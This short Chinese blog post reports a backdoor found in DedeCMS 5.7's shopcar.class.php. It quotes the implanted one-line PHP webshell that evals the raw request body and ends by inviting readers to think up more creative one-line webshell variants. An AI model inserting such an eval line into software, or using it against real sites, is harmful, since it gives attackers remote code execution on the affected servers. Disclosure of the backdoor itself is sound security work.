DEDE5.7 爆出后门

 汗,dede5.7版本竟然被搞了个后门出来,不知道是不是真的,好像很多人都在说这个事!

是说

 

shopcar.class.php 被植入一句话
 
@eval(file_get_contents(''php://input''));
 
呵呵,确实是被植入了一句话,不过这句话是在构造函数里面的,要被实例化的时候才能被执行!
 
网上exp有了,我就不发了!不过从这个里面我们可以学到一些东西嘛,其实一句话木马的写法还是很多的嘛,不妨再给点创意?

 




[本日志由 admin 于 2012-04-25 00:14 AM 编辑]

有什么问题可以加群,100852896
点击这里加入此群 在线提问
文章来自: 本站原创
Tags:
评论: 0 | 查看次数: 6392
博主QQ: 友情链接请找我
QQ群: 灰色档案
返回顶部 关闭